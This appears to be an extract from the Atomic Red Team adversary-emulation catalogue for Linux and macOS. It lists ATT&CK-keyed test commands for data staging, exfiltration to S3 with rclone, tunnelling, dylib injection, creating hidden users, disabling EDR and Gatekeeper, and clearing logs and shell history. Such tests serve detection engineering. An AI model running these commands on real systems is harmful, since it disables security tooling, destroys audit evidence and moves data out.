An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression.
tar -cvzf #{output_file} #{input_file_folder}
T1560.001
sh
linux, macos
Data Encrypted with zip and gpg symmetric
Archive via Utility
Encrypt data for exiltration
mkdir -p #{test_folder}
cd #{test_folder}; touch a b c d e f g
zip --password "#{encryption_password}" #{test_folder}/#{test_file} ./*
echo "#{encryption_password}" | gpg --batch --yes --passphrase-fd 0 --output #{test_folder}/#{test_file}.zip.gpg -c #{test_folder}/#{test_file}.zip
ls -l #{test_folder}
T1560.001
bash
linux, macos
Encrypts collected data with AES-256 and Base64
Archive via Utility
An adversary may compress all the collected data, encrypt and send them to a C2 server using base64 encoding. This atomic test tries to emulate the behaviour of the FLEXIROOT backdoor to archive the collected data. FLEXIROOT typically utilizes AES encryption and base64 encoding to transfer the encrypted data to the C2 server. In this test, standard zip compression and the OpenSSL library are used to encrypt the compressed data. https://attack.mitre.org/versions/v7/software/S0267/
zip -r #{input_folder}/#{input_file}.zip #{input_folder}
openssl enc -aes-256-cbc -pass pass:#{enc_pass} -p -in #{input_folder}/#{input_file}.zip -out #{input_folder}/#{input_file}.enc
cat #{input_folder}/#{input_file}.enc | base64
T1564.001
sh
linux, macos
Create a hidden file in a hidden directory
Hidden Files and Directories
Creates a hidden file inside a hidden directory
mkdir /var/tmp/.hidden-directory
echo "T1564.001" > /var/tmp/.hidden-directory/.hidden-file
Hidden Files and Directories
Hide a file on MacOS
xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00 40 00 FF FF FF FF 00 00"
Hidden Files and Directories
Requires Apple Dev Tools
setfile -a V #{filename}
Hidden Files and Directories
Hide a directory on MacOS
touch /var/tmp/T1564.001_mac.txt
chflags hidden /var/tmp/T1564.001_mac.txt
Hidden Files and Directories
Show all hidden files on MacOS
defaults write com.apple.finder AppleShowAllFiles YES
T1564.002
sh
elevated
macos
Create Hidden User using UniqueID < 500
Hidden Users
Add a hidden user on macOS using Unique ID < 500 (users with that ID are hidden by default)
sudo dscl . -create /Users/#{user_name} UniqueID 333
T1564.002
sh
elevated
macos
Create Hidden User using IsHidden option
Hidden Users
Add a hidden user on macOS using IsHidden optoin
sudo dscl . -create /Users/#{user_name} IsHidden 1
T1567.002
powershell
linux, macos
Exfiltrate data with rclone to cloud Storage - AWS S3
Exfiltration to Cloud Storage
This test uses rclone to exfiltrate data to a remote cloud storage instance. (AWS S3) See https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/
Write-Host "Deploying AWS infrastructure... " -NoNewLine
$awsAccessKey = "#{aws_access_key}"
$awsSecretKey = "#{aws_secret_key}"
cd PathToAtomicsFolder/T1567.002/src/
if ($awsAccessKey -eq "" -or $awsSecretKey -eq "") {
$env:AWS_PROFILE = "#{aws_profile}"
} else {
$env:AWS_ACCESS_KEY_ID = "$awsAccessKey"
$env:AWS_SECRET_ACCESS_KEY = "$awsSecretKey"
}
$null = PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v*/terraform init
$null = PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v*/terraform apply -var "aws_region=#{aws_region}" -auto-approve
Write-Host "Done!"
Write-Host "Generating rclone config... " -NoNewLine
$config = @"
[exfils3]
type = s3
provider = AWS
env_auth = true
region = #{aws_region}
"@
$config | Out-File -FilePath "PathToAtomicsFolder/../ExternalPayloads/T1567.002/rclone.conf" -Encoding ascii
Write-Host "Done!"
Write-Host "Exfiltrating data... " -NoNewLine
$bucket = "$(PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v*/terraform output bucket)".Replace("`"","")
cd PathToAtomicsFolder/../ExternalPayloads/T1567.002/rclone-v*
$null = ./rclone copy --max-size 1700k "PathToAtomicsFolder/../ExternalPayloads/T1567.002/data/" exfils3:$bucket --config "PathToAtomicsFolder/../ExternalPayloads/T1567.002/rclone.conf"
Write-Host "Done!"
Launchctl
Utilize launchctl
launchctl submit -l #{label_name} -- #{executable_path}
T1571
sh
linux, macos
Testing usage of uncommonly used port
Non-Standard Port
Testing uncommonly used port utilizing telnet.
echo quit | telnet #{domain} #{port}
exit 0
T1572
bash
linux, macos
Microsoft Dev tunnels (Linux/macOS)
Protocol Tunneling
Dev Tunnels enables insiders as well as threat actors to expose local ports over the internet via Microsoft dev tunnels. This atomic will generate a dev tunnel binding it to the local service running on the provided port. Can be used to expose local services, web applications and local files etc. Reference: - [Microsoft Docs](https://learn.microsoft.com/en-us/tunnels/dev-tunnels-overview) - [LOT Tunnels](https://lottunnels.github.io/lottunnels/Binaries/devtunnels/)
#{binary_path} host -p #{port} &
T1572
sh
linux, macos
VSCode tunnels (Linux/macOS)
Protocol Tunneling
Visual Studio Code Remote Tunnels can be used for exposing local development environment/services/files over the internet. This atomic will generate a dev tunnel binding it to the local service running on the provided port. Reference: - [Microsoft Docs](https://code.visualstudio.com/docs/remote/tunnels) - [LOT Tunnels](https://lottunnels.github.io/lottunnels/Binaries/vscode-server/)
nohup code tunnel --accept-server-license-terms #{additional_args} >/dev/null 2>&1 &
T1572
sh
linux, macos
Cloudflare tunnels (Linux/macOS)
Protocol Tunneling
Cloudflared can be used for exposing local development environment/services/files over the internet. This atomic will generate a dev tunnel binding it to the local service running on the provided port. Reference: - [Cloudflared Docs](https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/) - [LOT Tunnels](https://lottunnels.github.io/lottunnels/Binaries/cloudflared/)
nohup #{binary_path} tunnel --url #{url_to_tunnel} #{additional_args} >/dev/null 2>&1 &
T1574.006
bash
macos
Dylib Injection via DYLD_INSERT_LIBRARIES
Dynamic Linker Hijacking
injects a dylib that opens calculator via env variable
DYLD_INSERT_LIBRARIES=#{dylib_file} #{file_to_inject}
T1580
sh
linux, macos, iaas:aws
AWS - EC2 Enumeration from Cloud Instance
Cloud Infrastructure Discovery
This atomic runs several API calls (sts:GetCallerIdentity, s3:ListBuckets, iam:GetAccountSummary, iam:ListRoles, iam:ListUsers, iam:GetAccountAuthorizationDetails, ec2:DescribeSnapshots, cloudtrail:DescribeTrails, guardduty:ListDetectors) from the context of an EC2 instance role. This simulates an attacker compromising an EC2 instance and running initial discovery commands on it. This atomic test leverages a tool called stratus-red-team built by DataDog (https://github.com/DataDog/stratus-red-team). Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.discovery.ec2-enumerate-from-instance/
export AWS_REGION=#{aws_region}
cd #{stratus_path}
echo "Stratus: Start Warmup."
./stratus warmup aws.discovery.ec2-enumerate-from-instance
echo "Stratus: Start Detonate."
./stratus detonate aws.discovery.ec2-enumerate-from-instance
T1595.003
powershell
windows, linux, macos
Web Server Wordlist Scan
Wordlist Scanning
This test will scan a target system with a wordlist of common directories and file paths.
Import-Module "PathToAtomicsFolder/T1595.003/src/WebServerScan.ps1"
Invoke-WordlistScan -Target "#{target}" -Wordlist "#{wordlist}" -Timeout "#{request_timeout}" -OutputFile "#{output_file}"
Write-Host "Scan complete. Results saved to: #{output_file}"
T1614
bash
macos, linux
Get geolocation info through IP-Lookup services using curl freebsd, linux or macos
System Location Discovery
Get geolocation info through IP-Lookup services using curl Windows. The default URL of the IP-Lookup service is https://ipinfo.io/. References: https://securelist.com/transparent-tribe-part-1/98127/ and https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
curl -k #{ip_lookup_url}
T1647
manual
macos
Plist Modification
Plist File Modification
Modify MacOS plist file in one of two directories
T1652
bash
macos
List loaded kernel extensions (macOS)
Device Driver Discovery
Displays a list of loaded kernel extensions (kexts) on a macOS system.
kextstat
T1652
bash
macos
Find Kernel Extensions (macOS)
Device Driver Discovery
Searches for kernel extension (kext) files on a macOS system.
kextfind
T1659
bash
macos, linux
MITM Proxy Injection
Content Injection
Start mitmdump and verify injected header and HTML content.
curl -skI --proxy http://127.0.0.1:8080 http://example.com > /tmp/curl_out.txt
grep "X-Atomic" /tmp/curl_out.txt || (cat /tmp/curl_out.txt && exit 1)
curl -sk --proxy http://127.0.0.1:8080 http://example.com > /tmp/atomic_t1659_page.html
grep -q "Atomic T1659 Injection" /tmp/atomic_t1659_page.html || (head -20 /tmp/atomic_t1659_page.html; exit 1)
T1685
sh
elevated
macos
Disable Carbon Black Response
Disable or Modify Tools
Disables Carbon Black Response
sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist
sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.defense.daemon.plist
T1685
sh
elevated
macos
Disable LittleSnitch
Disable or Modify Tools
Disables LittleSnitch
sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
T1685
sh
elevated
macos
Disable OpenDNS Umbrella
Disable or Modify Tools
Disables OpenDNS Umbrella
sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
T1685
sh
elevated
macos
Disable macOS Gatekeeper
Disable or Modify Tools
Disables macOS Gatekeeper
sudo spctl --master-disable
T1685
sh
elevated
macos
Stop and unload Crowdstrike Falcon on macOS
Disable or Modify Tools
Stop and unload Crowdstrike Falcon daemons falcond and userdaemon on macOS
sudo launchctl unload #{falcond_plist}
sudo launchctl unload #{userdaemon_plist}
T1685
sh
elevated
linux, macos
Tamper with Defender ATP on Linux/MacOS
Disable or Modify Tools
With root privileges, an adversary can disable real time protection. Note, this test assumes Defender is not in passive mode and real-time protection is enabled. The use of a managed.json on Linux or Defender .plist on MacOS will prevent these changes. Tamper protection will also prevent this (available on MacOS, but not Linux at the time of writing). Installation of MDATP is a prerequisite. Installation steps vary across MacOS and Linux distros. See Microsoft public documentation for instructions: https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/mac-install-manually?view=o365-worldwide https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/linux-install-manually?view=o365-worldwide
sudo mdatp config real-time-protection --value disabled
T1685.002
sh
linux, macos, iaas:aws
AWS - Disable CloudTrail Logging Through Event Selectors using Stratus
Disable or Modify Cloud Log
Update event selectors in AWS CloudTrail to disable the logging of certain management events to evade defense. This Atomic test leverages a tool called Stratus-Red-Team built by DataDog (https://github.com/DataDog/stratus-red-team). Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-event-selectors/
export AWS_REGION=#{aws_region}
cd #{stratus_path}
echo "starting warmup"
./stratus warmup aws.defense-evasion.cloudtrail-event-selectors
echo "starting detonate"
./stratus detonate aws.defense-evasion.cloudtrail-event-selectors --force
T1685.002
sh
linux, macos, iaas:aws
AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus
Disable or Modify Cloud Log
This Atomic test will use the Stratus Red Team will first setup a CloudTrail logging into an S3 bucket and will then make an API call to update the lifecycle rule on that S3 bucket with an expiration date of 1 day. This will essentially delete all the logs after one day. Adversaries often do this actiivity to evade detection. Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-lifecycle-rule/
export AWS_REGION=#{aws_region}
cd #{stratus_path}
echo "starting warmup"
./stratus warmup aws.defense-evasion.cloudtrail-lifecycle-rule
echo "starting detonate"
./stratus detonate aws.defense-evasion.cloudtrail-lifecycle-rule --force
T1685.002
sh
linux, macos, iaas:aws
AWS - Remove VPC Flow Logs using Stratus
Disable or Modify Cloud Log
This Atomic will attempt to remove AWS VPC Flow Logs configuration. Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.vpc-remove-flow-logs/
export AWS_REGION=#{aws_region}
cd #{stratus_path}
echo "starting warmup"
./stratus warmup aws.defense-evasion.vpc-remove-flow-logs
echo "starting detonate"
./stratus detonate aws.defense-evasion.vpc-remove-flow-logs --force
Clear Linux or Mac System Logs
Delete system and audit logs
sudo rm -rf #{syslog_path}
if [ -d /var/audit ] ; then sudo rm -rf #{macos_audit_path} ; fi
T1685.006
sh
elevated
macos
Delete log files using built-in log utility
Clear Linux or Mac System Logs
This test deletes main log datastore, inflight log data, time-to-live data(TTL), fault and error content
sudo log erase --all
sudo log erase --ttl #Deletes only time-to-live log content
T1685.006
sh
elevated
macos
Truncate system log files via truncate utility
Clear Linux or Mac System Logs
This test truncates the system log files using the truncate utility with (-s 0) parameter which sets file size to zero, thus emptying the file content
sudo truncate -s 0 #{system_log_path} #size parameter shorthand
T1685.006
sh
elevated
macos
Delete log files via cat utility by appending /dev/null or /dev/zero
Clear Linux or Mac System Logs
The first sub-test truncates the log file to zero bytes via /dev/null and the second sub-test fills the log file with null bytes(zeroes) via /dev/zero, using cat utility
sudo cat /dev/null > #{system_log_path} #truncating the file to zero bytes
sudo dd if=/dev/zero bs=1000 count=5 of=#{system_log_path} #log file filled with null bytes(zeros)
T1685.006
sh
elevated
macos
System log file deletion via find utility
Clear Linux or Mac System Logs
This test finds and deletes the system log files within /var/log/ directory using various executions(rm, shred, unlink)
sudo find /var/log -name '#{system_log_name1}*' -exec rm {} \; #using "rm" execution
sudo find /var/log -name "#{system_log_name2}*" -exec shred -u -z -n 3 {} \; #using "shred" execution
sudo find /var/log -name "#{system_log_name3}*" -exec unlink {} \; #using "unlink" execution
T1685.006
sh
elevated
macos
Overwrite macOS system log via echo utility
Clear Linux or Mac System Logs
This test overwrites the contents of system log file with an empty string using echo utility
sudo echo '' > #{system_log_path}
T1685.006
sh
elevated
macos
Real-time system log clearance/deletion
Clear Linux or Mac System Logs
This test reads real-time system log file and writes empty string to it, thus clearing the log file without tampering with the logging process
sudo log -f /var/log/system.log | : > /var/log/system.log
T1685.006
sh
elevated
macos
Delete system log files via unlink utility
Clear Linux or Mac System Logs
This test deletes the system log file using unlink utility
sudo unlink #{system_log_path}
T1685.006
sh
elevated
macos
Delete system log files using shred utility
Clear Linux or Mac System Logs
This test overwrites the contents of the log file with zero bytes(-z) using three passes(-n 3) of data, and then delete the file(-u) securely
sudo shred -u -z -n 3 #{system_log_path}
T1685.006
sh
elevated
macos
Delete system log files using srm utility
Clear Linux or Mac System Logs
This test securely deletes the system log files individually and recursively using the srm utility. Install srm using Homebrew with the command: brew install khell/homebrew-srm/srm Refer: https://github.com/khell/homebrew-srm/issues/1 for installation
sudo srm #{system_log_path} #system log file deletion
sudo srm -r #{system_log_folder} #recursive deletion of log files
T1685.006
sh
elevated
macos
Delete system log files using OSAScript
Clear Linux or Mac System Logs
This test deletes the system log file using osascript via "do shell script"(sh/bash by default) which in-turn spawns rm utility, requires admin privileges
osascript -e 'do shell script "rm #{system_log_path}" with administrator privileges'
T1685.006
sh
elevated
macos
Delete system log files using Applescript
Clear Linux or Mac System Logs
This test deletes the system log file using applescript using osascript via Finder application Note: The user may be prompted to grant access to the Finder application before the command can be executed successfully as part of TCC(Transparency, Consent, and Control) Framework. Refer: https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive
osascript -e 'tell application "Finder" to delete POSIX file "#{system_log_path}"'
T1690
sh
linux, macos
Disable history collection
Prevent Command History Logging
Disables history collection in shells
export HISTCONTROL=ignoreboth
#{evil_command}
T1690
manual
macos, linux
Mac HISTCONTROL
Prevent Command History Logging
The HISTCONTROL variable is set to ignore (not write to the history file) command that are a duplicate of something already in the history and commands that start with a space. This atomic sets this variable in the current session and also writes it to the current user's ~/.bash_profile so that it will apply to all future settings as well. https://www.linuxjournal.com/content/using-bash-history-more-efficiently-histcontrol